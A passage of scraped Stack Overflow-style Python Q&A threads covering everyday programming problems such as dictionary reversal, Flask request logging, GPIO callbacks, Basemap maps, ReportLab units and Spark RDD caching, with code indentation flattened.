then my function should return
{'precise': ['accurate', 'exact'], 'clever': ['astute', 'smart'], 'talented': ['smart'], 'bright': ['smart'], 'exact': ['accurate'], 'smart': ['astute']}
Here's my function
def reverse_dictionary(input_dict):
d={}
def countEmpty(dictionario):
count=0
for k,v in dictionario.items():
if(len(dictionario[k])==0):
count+=1
return count
def removo(dicto, dicto2):
for k,v in dicto.items():
#v.sort()
if (len(dicto[k])!=0):
if v[-1] not in dicto2:
dicto2[v[-1].lower()]=[k.lower()]
else:
dicto2[v[-1]].append(k.lower())
dicto[k]=v[:-1]
while countEmpty(input_dict)<len(input_dict):
removo(input_dict,d)
for k,v in d.items():
v.sort()
return d
dicta={'astute': ['Smart', 'clever', 'talented'], 'Accurate': ['exact', 'precise'], 'exact': ['precise'], 'talented': ['smart', 'keen', 'Bright'], 'smart': ['clever', 'bright', 'talented']}
print(reverse_dictionary(dicta))
The program initially works. It reverses the dictionary. But the values in the
dictionary need to be sorted. I've tested the program with:
dicta={'astute': ['Smart', 'clever', 'talented'], 'Accurate': ['exact', 'precise'], 'exact': ['precise'], 'talented': ['smart', 'keen', 'Bright'], 'smart': ['clever', 'bright', 'talented']}
And it sometimes returns:
{'keen': ['talented'], 'talented': ['astute', 'smart'], 'clever': ['astute', 'smart'], 'exact': ['accurate'], 'bright': ['smart', 'talented'], 'precise': ['accurate', 'exact'], 'smart': ['astute', 'talented']}
Which is the correct answer, but at times it also returns:
{'bright': ['smart', 'talented'], 'exact': ['accurate'], 'talented': ['astute', 'smart'], 'precise': ['accurate', 'exact'], 'clever': ['astute', 'smart'], 'smart': ['astute'], 'keen': ['talented']}
which has the 'smart' key missing the 'talented' value. Even if I have done
nothing to change the code. I understand dictionaries in python don't really
have any order, but shouldn't the values be consistent? Why does this happen?
Answer: You can make a sorted list of tuples associating each value with its key in
the original dict, then use itertools.groupby, dict comprehension and list
comprehesion to merge the output:
import itertools
d = {'accurate': ['exact', 'precise'],
'exact': ['precise'],
'astute': ['smart', 'clever'],
'smart': ['clever', 'bright', 'talented']}
l = sorted([(v2,k) for k, v in d.items() for v2 in v])
{k:list(x[1] for x in g) for k, g in itertools.groupby(l, lambda x: x[0])}
Intermediate list l:
[('bright', 'smart'),
('clever', 'astute'),
('clever', 'smart'),
('exact', 'accurate'),
('precise', 'accurate'),
('precise', 'exact'),
('smart', 'astute'),
('talented', 'smart')]
Output:
{'bright': ['smart'],
'clever': ['astute', 'smart'],
'exact': ['accurate'],
'precise': ['accurate', 'exact'],
'smart': ['astute'],
'talented': ['smart']}
|
Python exceptions and regex
Question: I have an expression which I'm using to raise exceptions in the code, except
one case where this expression is allowed:
searchexp = re.search( r'^exp1=.*, exp2=(.*),.*', line )
I want to raise an exception whenever this condition is hit except one case
when I want it to print a warning
elif searchexp:
if searchexp.group(1) == 'tag'):
print("-w- just a warning that its a tag")
else:
raise Exception("-E- This is illegal to do")
In simple English
if (searchexp)
raise an Exception except if searchexp.group(1) == 'tag'
How do I do this in python?
Answer: You can do it this way. Wrap every `re.search()` with `wrap_search()`. Which
will check the returned match.
import warnings
def wrap_search(match):
if not match:
return
if match.group(1) == "tag":
warnings.warn("-w- just a warning that its a tag")
else:
raise Exception("-E- This is illegal to do")
return match
searchexp = wrap_search(re.search( r'^exp1=.*, exp2=(.*),.*', line ))
|
conditional frequency distribution nltk
Question: I'm a complete newbie and learning to use python using the natural language
toolkit. I have been trying to analyze a text in terms of most common words in
it. Specifically, I am trying to make a graph of the most frequent long words
(more than 6 letters) in it. Could anyone suggest how to tweak the Cumulative
Frequency Plot fdist.plot(cumulative=False) so it works only with long words?
thank you!
Answer: After tokenizing your word list, eliminate the undesired words with len() in a
list comprehension.
from nltk import word_tokenize
tokens = word_tokenize(input_string)
long_words = [x for x in tokens if len(x) > 7]
Perform your analysis using this new list of tokens. Check out [this
page](http://www.nltk.org/book/ch01.html) for a more extensive explanation.
|
Time between button press and release in python?
Question: I am trying to time from the start of a button press to the end of a button
press on GPIO (in order to differentiate between a long press and a short
press). I want to use a callback to get the button presses immediately and
without polling. Here is what I tried first:
import RPi.GPIO as GPIO
import time
def my_callback(channel):
start = time.time()
GPIO.add_event_detect(25, GPIO.FALLING)
end = time.time()
elapsed = end - start
print(elapsed)
GPIO.add_event_detect(25, GPIO.RISING, callback=my_callback)
#while other stuff is running
On running this program I get:
> RunTimeError: Conflicting edge detection already enabled for this GPIO
> channel.
Because I can't poll both I tried:
def my_callback(channel):
GPIO.remove.event.detect(25)
start = time.time()
GPIO.add_event_detect(25, GPIO.FALLING)
end = time.time()
elapsed = end - start
print(elapsed)
GPIO.add_event_detect(25, GPIO.RISING, callback=my_callback)
This worked once but was not repeatable because I am removing the event
detection and redefining it. Thus I tried to restore the event detect in the
callback:
def my_callback(channel):
GPIO.remove.event.detect(25)
start = time.time()
GPIO.add_event_detect(25, GPIO.FALLING)
end = time.time()
elapsed = end - start
print(elapsed)
GPIO.remove.event.detect(25)
GPIO.add_event_detect(25, GPIO.RISING, callback=my_callback)
GPIO.add_event_detect(25, GPIO.RISING, callback=my_callback)
This finally worked, but will crash my pi quickly, as I think I created a
loop-back. Is there another way to accomplish this that I am overlooking?
Answer: Thanks to jDo here is the code that works
def my_callback(channel):
global start
global end
if GPIO.input(25) == 1:
start = time.time()
if GPIO.input(25) == 0:
end = time.time()
elapsed = end - start
print(elapsed)
GPIO.add_event_detect(25, GPIO.BOTH, callback=my_callback, bouncetime=200)
|
Provide a password for the "git push" command in GitPython
Question: In Python, using [GitPython](https://github.com/gitpython-
developers/GitPython), I need to `git push` to a HTTPS remote repository on
BitBucket.
After running the `repo.git.push()` command, it will return _-as expected-_ :
> bash: /dev/tty: No such device or address
>
> error: failed to execute prompt script (exit code 1)
>
> fatal: could not read Password for '<https://[email protected]>':
> Invalid argument'
But Python will give me no change to enter the password like in the console.
**How can I "attach" the password to the`git push` command or how can simulate
a console password entry in Python?**
_It is important to note that unfortunately using SSH is**not** an alternative
(the script should not requiere any further action to user that receives it
and that wants to `git push`). I'm looking to "attach" the password into the
command or to "simulate" a text entry on it._
Answer: **What you are attempting to is skirt past security.**
You need to create a pair of ssh keys.
Then, log-on to your bitbucket account's website and upload your public key.
Store your keys in your `~/.ssh` directory.
When you have your keys setup you will not be prompted for a password anymore.
Here is more information about working with SSH keys:
<https://help.github.com/articles/generating-an-ssh-key/>
|
Looking to find specific phrases in file using Python
Question: I am aware that there are some quite similar posts about this on the forum but
I need this for a quick scan of a text file. I have to run 500 checks through
a 1 GB file and print out lines that contain certain phrases, here is my code:
import re
with open('text.txt', 'r') as f:
searchstrings = ('aaAa','bBbb')
for line in f.readlines():
for word in searchstrings:
word2 = ".*" + word + ".*"
match = re.search(word2, line)
if match:
print word + " " + line
I was trying to make it return any line containing those phrases, so even if
the line was "BBjahdAAAAmm" I wanted it returned because it has aaaa in it.
aaAa and bBbb are just examples, the list is completely different.
Answer: Don't use `f.readlines()` You'll be loading the whole 1GB into memory. Read
them one at a time.
Instead do:
searchstrings = ('aaAa','bBbb')
with open('text.txt', 'r') as f:
for line in f:
for word in searchstrings:
if word.lower() in line.lower():
print word + " " + line
|
Python path.exists and path.join
Question: Python 2.7: Struggling a little with path.exists
import os
import platform
OS = platform.system()
CPU_ARCH = platform.machine()
if os.path.exists( os.path.join("/dir/to/place/" , CPU_ARCH) ):
print "WORKED"
# Linux
LD_LIBRARY_PATH = "/dir/to/place/" + CPU_ARCH
TRANSCODER_DIR = LD_LIBRARY_PATH + "/Resources/"
else:
print "FAILED"
#fail back to original director if processor not recognised
TRANSCODER_DIR = "/dir/to/place/Resources/"
LD_LIBRARY_PATH = "/dir/to/place"
As soon as I stick os.path.join with a variable inside it the if statement
fails.
os.path.exists("/dir/to/place/arch")
returns TRUE
os.path.exists("/dir/to/place/" + CPU_ARCH)
returns FALSE
I have tried many variations on the different path commands and to string
commands none of them allow me to change this with a variable.
os.path.join("/dir/to/place/", CPU_ARCH)
returns /dir/to/place/arch
it's not a permissions issues either full perms granted and I've tested using
the python cli on it's own still the same issue.
I've looked at all the stack posts for the same issue and the only response
I've seen that someone says has worked is to strip the white space, I'm pretty
new to python I don't see any whitespace on this.
Answer: `os.path.exists` checks if a path exists.
if `/dir/to/place/arch` exists, then
os.path.exists("/dir/to/place/" + CPU_ARCH)
should return True. **Notice the trailing / after`place` that is missing in
your example**
`os.path.join` will join all its arguments to create a path.
# This joins the two arguments into one path
os.path.join("/dir/to/place/", CPU_ARCH)
# >>> '/dir/to/place/x86_64'
Explaining your results.
|
Bypass Referral Denied error in selenium using python
Question: I was making a script to download images from comic naver and I'm kind of done
with it, however I can't seem to save the images. I successfully grabbed the
images via urlib and BeasutifulSoup, now, seems like they've introduced
hotlink blocking and I can't seem to save the images on my system via urlib or
selenium.
Update: I tried changing the useragent to see if that was causing problems...
still the same.
Any fix or solution?
My code right now :
import requests
from bs4 import BeautifulSoup
import re
import urllib
import urllib2
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
dcap = dict(DesiredCapabilities.PHANTOMJS)
dcap["phantomjs.page.settings.userAgent"] = (
"Chrome/15.0.87"
)
url = "http://comic.naver.com/webtoon/detail.nhn?titleId=654817&no=44&weekday=tue"
driver = webdriver.PhantomJS(desired_capabilities=dcap)
soup = BeautifulSoup(urllib.urlopen(url).read())
scripts = soup.findAll('img', alt='comic content')
for links in scripts:
Imagelinks = links['src']
filename = Imagelinks.split('_')[-1]
print 'Downloading Image : '+filename
driver.get(Imagelinks)
driver.save_screenshot(filename)
driver.close()
Following 'MAI's' reply, I tried what I could with selenium, and got what I
wanted. It's solved now. My code :
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.common.exceptions import TimeoutException
from bs4 import BeautifulSoup
from selenium.webdriver.common.action_chains import ActionChains
driver = webdriver.Chrome()
url = "http://comic.naver.com/webtoon/detail.nhn?titleId=654817&no=44&weekday=tue"
driver.get(url)
elem = driver.find_elements_by_xpath("//div[@class='wt_viewer']//img[@alt='comic content']")
for links in elem:
print links.get_attribute('src')
driver.quit()
but, when I try to taek screenshots of this, it shows that the "element is not
attached to the page". Now, how am I supposed to solve that :/
Answer: I took a short look at the website with Chrome dev tools.
I would suggest you to download the image directly instead of screen-shooting.
Selenium webdriver should actually run the javascripts on PhantomJS headless
browser, so you should get images loaded by javascript at the following path.
The path that I am getting by eye-balling the html is
> html body #wrap #container #content div #comic_view_area div img
The image tags in the last level have IDs like `content_image_N`, `N` counting
from 0. So you can also get specific picture by using `img#content_image_0`
for example.
|
Changing all occurences of similar word in csv python
Question: I want to replace one specific word, 'my' with 'your'. But seems my code can
only change one appearance.
import csv
path1 = "/home/bankdata/levelout.csv"
path2 = "/home/bankdata/leveloutmodify.csv"
in_file = open(path1,"rb")
reader = csv.reader(in_file)
out_file = open(path2,"wb")
writer = csv.writer(out_file)
with open(path1, 'r') as csv_file:
csvreader = csv.reader(csv_file)
col_count = 0
for row in csvreader:
while row[col_count] == 'my':
print 'my is used'
row[col_count] = 'your'
#writer.writerow(row[col_count])
writer.writerow(row)
col_count +=1
let's say the sentences is
'my book is gone and my bag is missing'
the output is
your book is gone and my bag is missing
the second thing is I want to make it appear without comma separated:
print row
the output is
your,book,is,gone,and,my,bag,is,missing,
Answer: for the second problem, im still trying to find the correct one as it keeps
giving me the same output with comma separated.
with open(path1) as infile, open(path2, "w") as outfile:
for row in infile:
outfile.write(row.replace(",", ""))
print row
it gives me the result:
your,book,is,gone,and,my,bag,is,missing
I send out this sentence to my Nao robot and the robot seems pronouncing
awkwardly as there are commas in between each word.
I solved it by:
with open(path1) as infile, open(path2, "w") as outfile:
for row in infile:
outfile.write(row.replace(",", ""))
with open(path2) as out:
for row in out:
print row
It gives me what I want:
your book is gone and your bag is missing too
However, any better way to do it?
|
Debugging a request/response in Python flask
Question: I am new to [python2 flask](http://flask.pocoo.org/) & I am tasked to pretty
print & save the entire HTTP request and response to file. I don't quite
understand how to print/inspect the request object, let alone the response.
from flask import Flask, request
app = Flask(__name__)
@app.route('/')
def hi():
print (request)
return 'oh hai'
if __name__ == '__main__':
app.run(debug=True)
Any tips? Each request/response should be one file.
Answer: Using
[**after_request**](http://flask.pocoo.org/docs/0.10/api/#flask.Flask.after_request)
@app.after_request
def after(response):
# todo with response
print response.status
print response.headers
print response.get_data()
return response
Aslo, to deal with request with
[**before_request**](http://flask.pocoo.org/docs/0.10/api/#flask.Flask.before_request)
@app.before_request
def before():
# todo with request
# e.g. print request.headers
pass
## Edit:
`response.get_data()` can get the data of response. And `response` is the
whole object for response. It can fetch anything you want.
## Update for some specific url (based on
<http://s.natalian.org/2016-03-19/foo.py>):
from __future__ import print_function
from flask import Flask, request, g
import time
app = Flask(__name__)
@app.route('/')
def hi():
g.fn = str(time.time()) + ".txt"
with open(g.fn,'w') as f:
print ("Request headers", request.headers, file=f)
return 'oh hai'
@app.route('/foo')
def foo():
return 'foo'
@app.before_request
def before():
pass
@app.after_request
def after(response):
fn = g.get('fn', None)
if fn:
with open(fn,'a') as f:
print ("Printing response", file=f)
print (response.status, file=f)
print (response.headers, file=f)
print (response.get_data(), file=f)
return response
if __name__ == '__main__':
app.run(debug=True)
|
Easiest way to plot data on country map with python
Question: Could not delete question. Please refer to question: [Shade states of a
country according to dictionary values with
Basemap](http://stackoverflow.com/questions/36118998/shade-states-of-a-
country-according-to-dictionary-values-with-basemap)
I want to plot data (number of sick people for a certain year) on each state
of Mexico. I am using jupyter notebook. So far I have seen several options and
tutorials, but none seem to seem to explicitly explain how to plot the map of
a country. Below I explain some options/tutorial I have seen and why they have
not worked (this I do just to argue that tutorials are not very straight
forward):
1. Bokeh (<http://bokeh.pydata.org/en/latest/docs/gallery/texas.html>). In the tutorial texas state is plotted given that us_counties is in bokeh.sampledata. However I have not found other countries in the sampledata.
2. mpl_toolkits.basemap (<http://www.geophysique.be/2011/01/27/matplotlib-basemap-tutorial-07-shapefiles-unleached/>). Although I am able to import shapefile, I cannot run `from shapefile import ShapeFile` (ImportError: cannot import name ShapeFile). Furthermore I have not been able to download dbflib library.
3. Vincent ([Why Python Vincent map visuzalization does not map data from Data Frame?](http://stackoverflow.com/questions/32649494/why-python-vincent-map-visuzalization-does-not-map-data-from-data-frame)) When I run the code from the answer in said tutorial no image appears (even though I used command `vincent.core.initialize_notebook()` ).
4. Plotly (<https://plot.ly/python/choropleth-maps/>). The tutorial plots the map of USA importing information from a csv table (no information of other countries available). If wanting to plot another country, would it be possible to make the table?
Explored this 4 options I have found tutorials not to be very clear or easy to
follow. I find it hard to believe that plotting a map of a country is
difficult in python. I think there must be an easier way than the ones
explained in the past tutorials.
The question is: Which is the easiest (hopefully simple) way to plot the map
of a certain country (any) with python and how?
I have installed the following packages: matplotlib, pyshp,
mpl_toolkits.basemap, bokeh, pandas, numpy. I have also downloaded Mexico's
map from <http://www.gadm.org/>
Thanks in advance.
Answer: While this question seems to be unanswerable in its current form, I'll at
least note that you seem to be something wrong when using basemap - you don't
want to import Shapefile, but simply read it using the `readshapefile` method
of a `Basemap` object like so:
m = Basemap(projection='tmerc')
m.readshapefile("/path/to/your/shapefile", "mexican_states")
You will then be able to access the coordinates of each state's boundaries via
`m.mexican_states` (as a list of arrays) and the corresponding information
(such as names, maybe an indentifying code) by `m.mexican_states_info`. You
will then need some sort of dict or DataFrame containing names/codes for
states (corresponding to what is in `m.mexican_states_info`) and the values
you want to plot. A simple example would work something like this, assuming
that you have a dict called `mexican_states_sick_people` that looks something
like `{"Mexico City":123, "Chiapas":35, ...}`:
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.collections import PatchCollection
from mpl_toolkits.basemap import Basemap
from shapely.geometry import Polygon
from descartes import PolygonPatch
fig, ax = plt.subplots()
# Set up basemap and read in state shapefile (this will draw all state boundaries)
m = Basemap(projection='tmerc')
m.readshapefile("/path/to/your/shapefile", "mexican_states")
# Get maximum number of sick people to calculate shades for states based on relative number
max_sick = np.max(mexican_states_sick_people.values())
# Loop through the states contained in shapefile, attaching a PolygonPatch for each of them with shade corresponding to relative number of sick people
state_patches = []
for coordinates, state in zip(m.mexican_states, m.mexican_states_info):
if state["State_name"] in mexican_states_sick_people.keys():
shade = mexican_states_sick_people[state["State_name"]]/max_sick
state_patches.append(PolygonPatch(Polygon(coordinates), fc = "darkred", ec='#555555', lw=.2, alpha=shade, zorder=4)
# Put PatchCollection of states on the map
ax.add_collection(PatchCollection(state_patches, match_original=True))
This example should be more or less functional, if you have a working
shapefile of states and make sure that the dataset of sick people you have has
some sort of identifier (name or code) for each state that allows you to match
up the numbers with the identifier of states in the shapefile (this is what
the `shade = ...` line in the loop relies upon - in the example I'm accessing
the vals in the dictionary using a name from the shapefile as key).
Hope this helps, good luck!
|
Continued Fractions Python
Question: I am new to Python and was asked to create a program that would take an input
as a non-negative integer n and then compute an approximation for the value of
e using the first n + 1 terms of the continued fraction:
I have attempted to decipher the question but can't exactly understand
everything it is asking. I am not looking for an exact answer but hopefully an
example to help me on my way.
[This is the exact question](http://i.stack.imgur.com/5zbsz.jpg)
Below is a code I have done with continued fractions before.
import math
# Get x from user
x = float(input("Enter x = "))
# Calculate initial variables and print
a0 = x//1
r0 = x-a0
print("a0 =", a0, "\tr0 =", r0)
# Calculate ai and ri for i = 1,2,3 and print results
a1 = 1/r0//1
r1 = 1/r0 - a1
print("a1 =", a1, "\tr1 =", r1)
a2 = 1/r1//1
r2 = 1/r1 - a2
print("a2 =", a2, "\tr2 =", r2)
a3 = 1/r2//1
r3 = 1/r2 - a3
print("a3 =", a3, "\tr3 =", r3)
Answer: The value e can be expressed as the limit of the following continued fraction:
> e = 2 + 1 / (1 + 1 / (2 + 2 / (3 + 3 / (4 + 4 / (...)))))
The initial `2 + 1 /` falls outside of the main pattern, but after that it
just continues as shown. Your job is to evaluate this up to `n` deep, at which
point you stop and return the value up to that point.
Make sure you carry out the calculation in floating point.
|
Python Reportlab units, cm and inch, are translated differently
Question: If I draw two PDF files with ReportLab (vers. 3.2.0) with either cm or inch
settings I get two different PDFs.
I have two functions that to me look exactly equal. In one I place the text
into position (5.0*inch, 10.0*inch) and in the other I place them in
(5.0*2.54*cm, 10.0*2.54*cm). Obviously, I use 2.54 to translate the lengths
from inches to centimeters.
The problem is that the text gets placed in different positions. Am I missing
something, is this a bug or what's going on?
Below I have added the code that replicates my problem as well as pictures of
the two outcomes.
from reportlab.pdfgen import canvas
from reportlab.lib.units import inch, cm
from reportlab.lib.pagesizes import A4
def cm_test():
c = canvas.Canvas("inch.pdf", pagesize=A4)
c.translate(inch, inch)
text_object = c.beginText(5.0*inch, 10.0*inch)
text_object.textLine("INCH: text located here")
c.drawText(text_object)
c.save()
def inch_test():
c = canvas.Canvas("cm.pdf", pagesize=A4)
c.translate(cm, cm)
text_object = c.beginText(5.0*2.54*cm, 10.0*2.54*cm)
text_object.textLine("CM: text located here")
c.drawText(text_object)
c.save()
if __name__ == "__main__":
cm_test()
inch_test()
[Pic 1: Outcome of function cm_test()](http://i.stack.imgur.com/XC10n.png)
[Pic 2: Outcome of function inch_test()](http://i.stack.imgur.com/nk4z1.png)
Answer: This is not the bug, the reason the text is printed at different places as the
following lines:
c.translate(inch, inch)
c.translate(cm, cm)
These statements move the canvas origin 1 cm/inch up and right. As Reportlab
draws based on this origin the text is placed at different position.
|
Access Google spreadsheet from Google Appengine with service account : working once per hour
Question: I have implemented the python code here below based on the documentation in
order to access a spreadsheet accessible through a public link. It works once
every hour. If I execute a few seconds after a success, I receive an error :
Error opening spreadsheet no element found: line 1, column 0
Assumption: The access token has an expiry date of 1 hour. So the appengine
would proceed to a token refresh after an hour, resetting the whole.
Question: This code requests a new token for each request. So what should I do
? Save the token ? When I try the token_to_blob in order to save the token, I
get an error : Scope undefined
Thanks in advance for your help !
try :
credentials = AppAssertionCredentials(scope=('https://www.googleapis.com/auth/drive','https://spreadsheets.google.com/feeds','https://docs.google.com/feeds'))
logging.info("credentials")
http_auth = credentials.authorize(httplib2.Http())
authclient = build('oauth2','v2',http=http_auth)
auth2token = gdata.gauth.OAuth2TokenFromCredentials(credentials)
except Exception as details:
logging.error("Error Google credentials %s"%details)
return "Error"
try :
gd_client = gdata.spreadsheets.client.SpreadsheetsClient()
gd_client = auth2token.authorize(gd_client)
feed = gd_client.GetListFeed(<spreadsheetKey>,1)
except Exception as details:
logging.error("Error opening spreadsheet %s"%details)
return "Error"
Answer: I finally declared the credentials & the token as global. In this case, it was
working for several subsequent requests but after 1 hour, the token was
invalid.
I tested with the method access_token_expired but this method always returned
false.
So, I finally execute the refresh systematically and it works. Not elegant but
functional. Another option would be to store the time of next refresh and only
refresh after 1 hour.
Your comments are welcome for elegant alternatives.
I did not try gspread since the rest of the code was already functional for
gdata.spreadsheets but perhaps I should.
from oauth2client.contrib.appengine import AppAssertionCredentials
from oauth2client.client import Credentials
from oauth2client.service_account import ServiceAccountCredentials
from googleapiclient.discovery import build
import httplib2
global credentials
global auth2token
try :
credentials = AppAssertionCredentials(scope=('https://www.googleapis.com/auth/drive','https://spreadsheets.google.com/feeds','https://docs.google.com/feeds'))
http_auth = credentials.authorize(httplib2.Http())
authclient = build('oauth2','v2',http=http_auth)
auth2token = gdata.gauth.OAuth2TokenFromCredentials(credentials)
except Exception as details:
logging.error("Error Google credentials %s"%details)
class importFromSpreadsheet(webapp2.RequestHandler):
def __importFromSpreadsheet(self,u):
try :
credentials._refresh(httplib2.Http())
except Exception as details:
logging.error("Error refreshing Google credentials %s"%details)
...
try :
gd_client = gdata.spreadsheets.client.SpreadsheetsClient()
gd_client = auth2token.authorize(gd_client)
feed = gd_client.GetListFeed(u,1)
except Exception as details:
logging.error("Error opening 1st spreadsheet %s"%details)
return "Error"
|
How to properly update xlwings
Question: After xlwings is updated from `0.6` to `0.7.0`, I have the following problem.
**Although xlwings works** , when I click **Import Python UDFs** , I get an
error that tells:
> Run-time error '1004' Cannot run the macro...
The macro may not be available in this workbook or all macros may be disabled.
_Xlwings_ web site only tells about installation of the package. I could not
see steps for upgrading the package.
What is the proper way of upgrading _xlwings_? What should be the steps for
the upgrade?
Answer: The python package itself is updated like every other package (`pip install
--upgrade xlwings` or `conda upgrade xlwings`).
Updating the Excel add-in is explained
[here](http://docs.xlwings.org/en/stable/command_line.html#add-in-currently-
windows-only), the easiest way is to run `xlwings addin update`.
However, this expects that you have also installed the add-in previously with
`xlwings addin install`. If not, you could also update it manually by
replacing your current version (wherever that is saved) with the latest
version that is in the xlwings package (run `>>> import xlwings`, `>>>
xlwings.__path__` to see where the xlwings package has been installed).
By the way, I assume you're facing [this
issue](https://github.com/ZoomerAnalytics/xlwings/issues/331) that had been
fixed with v0.6.4
|
How to delete a specifil line by line number in a file?
Question: I'm trying to write a simple Phyton script that alway delete the line number 5
in a tex file, and replace with another string always at line 5. I look around
but I could't fine a solution, can anyone tell me the correct way to do that?
Here what I have so far:
#!/usr/bin/env python3
import od
import sys
import fileimput
f= open('prova.js', 'r')
filedata = f,read()
f.close ()
newdata = "mynewstring"
f = open('prova.js', 'w')
f.write(newdata, 5)
f.close
basically I need to add newdata at line 5.
Answer: One possible simple solution to remove/replace 5th line of file. This solution
should be fine as long as the file is not too large:
fn = 'prova.js'
newdata = "mynewstring"
with open(fn, 'r') as f:
lines = f.read().split('\n')
#to delete line use "del lines[4]"
#to replace line:
lines[4] = newdata
with open(fn,'w') as f:
f.write('\n'.join(lines))
|
Parsing Python JSON with multiple same strings with different values
Question: I am stuck on an issue where I am trying to parse for the id string in JSON
that exists more than 1 time. I am using the requests library to pull json
from an API. I am trying to retrieve all of the values of "id" but have only
been able to successfully pull the one that I define. Example json:
{
"apps": [{
"id": "app1",
"id": "app2",
"id": "new-app"
}]
}
So what I have done so far is turn the json response into dictionary so that I
am actually parse the first iteration of "id". I have tried to create for
loops but have been getting KeyError when trying to find string id or
TypeError: list indices must be integers or slices, not str. The only thing
that I have been able to do successfully is define which id locations to
output.
(data['apps'][N]['id']) -> where N = 0, 1 or 2
This would work if there was only going to be 1 string of id at a time but
will always be multiple and the location will change from time to time.
So how do return the values of all strings for "id" from this single json
output? Full code below:
import requests
url = "http://x.x.x.x:8080/v2/apps/"
response = requests.get(url)
#Error if not 200 and exit
ifresponse.status_code!=200:
print("Status:", response.status_code, "CheckURL.Exiting")
exit()
#Turn response into a dict and parse for ids
data = response.json()
for n in data:
print(data['apps'][0]['id'])
OUTPUT:
app1
UPDATE: Was able to get resolution thanks to Robᵩ. Here is what I ended up
using:
def list_hook(pairs):
result = {}
for name, value in pairs:
if name == 'id':
result.setdefault(name, []).append(value)
print(value)
data = response.json(object_pairs_hook = list_hook)
Also The API that I posted as example is not a real API. It was just supposed
to be a visual representation of what I was trying to achieve. I am actually
using [ Mesosphere's Marathon API
](https://mesosphere.github.io/marathon/docs/generated/api.html). Trying to
build a python listener for port mapping containers.
Answer: Your best choice is to contact the author of the API and let him know that his
data format is silly.
Your next-best choice is to modify the behavior of the the JSON parser by
passing in a hook function. Something like this should work:
def list_hook(pairs):
result = {}
for name, value in pairs:
if name == 'id':
result.setdefault(name, []).append(value)
else:
result[name] = value
return result
data = response.json(object_pairs_hook = list_hook)
for i in range(3):
print(i, data['apps'][0]['id'][i])
|
Using data from pythons pandas dataframes to sample from normal distributions
Question: I'm trying to sample from a normal distribution using means and standard
deviations that are stored in pandas DataFrames.
For example:
means= numpy.arange(10)
means=means.reshape(5,2)
produces:
0 1
0 0 1
1 2 3
2 4 5
3 6 7
4 8 9
and:
sts=numpy.arange(10,20)
sts=sts.reshape(5,2)
produces:
0 1
0 10 11
1 12 13
2 14 15
3 16 17
4 18 19
How would I produce another pandas dataframe with the same shape but with
values sampled from the normal distribution using the corresponding means and
standard deviations.
i.e. position `0,0` of this new dataframe would sample from a normal
distribution with `mean=0` and `standard deviation=10`, and so on.
My function so far:
def make_distributions(self):
num_data_points,num_species= self.means.shape
samples=[]
for i,j in zip(self.means,self.stds):
for k,l in zip(self.means[i],self.stds[j]):
samples.append( numpy.random.normal(k,l,self.n) )
will sample from the distributions for me but I'm having difficulty putting
the data back into the same shaped dataframe as the mean and standard
deviation dfs. Does anybody have any suggestions as to how to do this?
Thanks in advance.
Answer: You can use
[`numpy.random.normal`](http://docs.scipy.org/doc/numpy-1.10.1/reference/generated/numpy.random.normal.html)
to sample from a random normal distribution.
IIUC, then this might be easiest, taking advantage of
[`broadcasting`](http://docs.scipy.org/doc/numpy-1.10.1/user/basics.broadcasting.html):
import numpy as np
np.random.seed(1) # only for demonstration
np.random.normal(means,sts)
array([[ 16.24345364, -5.72932055],
[ -4.33806103, -10.94859209],
[ 16.11570681, -29.52308045],
[ 33.91698823, -5.94051732],
[ 13.74270373, 4.26196287]])
Check that it works:
np.random.seed(1)
print np.random.normal(0,10)
print np.random.normal(1,11)
16.2434536366
-5.72932055015
If you need a pandas DataFrame:
import pandas as pd
pd.DataFrame(np.random.normal(means,sts))
|
Does Spark discard ephemeral rdds immediately?
Question: Several sources describe RDDs as _ephemeral_ by default (e.g., [this s/o
answer](http://stackoverflow.com/a/25627654/5108214)) -- meaning that they do
not stay in memory unless we call cache() or persist() on them.
So let's say our program involves an ephemeral (not explicitly cached by the
user) RDD that is used in a few operations that cause the RDD to materialize.
My question is: does Spark _discard_ the materialized ephemeral RDD
_immediately_ \-- or is it possible that the RDD stays in memory for other
operations, even if we never asked for it to be cached?
Also, if an ephemeral RDD stays in memory, is it always only because some LRU
policy has not yet kicked it out -- or can it also be because of scheduling
optimizations?
I've tried to figure that out with code like that below -- run with Jupyter
notebook with python 3.5 and spark 1.6.0, on a 4-core machine -- but I would
appreciate an answer by someone who knows for sure.
import pyspark
sc = pyspark.SparkContext()
N = 1000000 # size of dataset
THRESHOLD = 100 # some constant
def f():
""" do not chache """
rdd = sc.parallelize(range(N))
for i in range(10):
print(rdd.filter(lambda x: x > i * THRESHOLD).count())
def g():
""" cache """
rdd = sc.parallelize(range(N)).cache()
for i in range(10):
print(rdd.filter(lambda x: x > i * THRESHOLD).count())
For the two functions above, f() does not ask the rdd to persist - but g()
does, at the beginning. When I time the two functions, foo() and boo(), I get
very comparable performance for the two, as if the cache() call has made no
difference. (In fact, the one that uses caching is slower).
%%timeit
f()
> 1 loops, best of 3: 2.19 s per loop
%%timeit
g()
> 1 loops, best of 3: 2.7 s per loop
Actually, even modifying f() to call unpersist() on the RDD does not change
things.
def ff():
""" modified f() with explicit call to unpersist() """
rdd = sc.parallelize(range(N))
for i in range(10):
rdd.unpersist()
print(rdd.filter(lambda x: x > i * THRESHOLD).count())
%%timeit
ff()
> 1 loops, best of 3: 2.25 s per loop
The documentation for unpersist() states that it "mark[s] the RDD as non-
persistent, and remove[s] all blocks for it from memory and disk." Is this
really so, though - or does Spark ignore the call to unpersist when it knows
it's going to use the RDD down the road?
Answer: There is simply no value in caching here. Creating `RDD` from a `range` is
extremely cheap (every partition needs only two integers to get going) and
action you apply cannot really benefit from caching. `persist` is applied on
the Java object not a Python one, and your code doesn't perform any work
between RDD creation and the first transformation.
Even if you ignore all of that this is a very simple task with tiny data.
Total cost is most likely driven by scheduling and communication than anything
else.
If you want to see caching in action consider following example:
from pyspark import SparkContext
import time
def f(x):
time.sleep(1)
return x
sc = SparkContext("local[5]")
rdd = sc.parallelize(range(50), 5).map(f)
rdd.cache()
%time rdd.count() # First run, no data cached ~10 s
## CPU times: user 16 ms, sys: 4 ms, total: 20 ms
## Wall time: 11.4 s
## 50
%time rdd.count() # Second time, task results fetched from cache
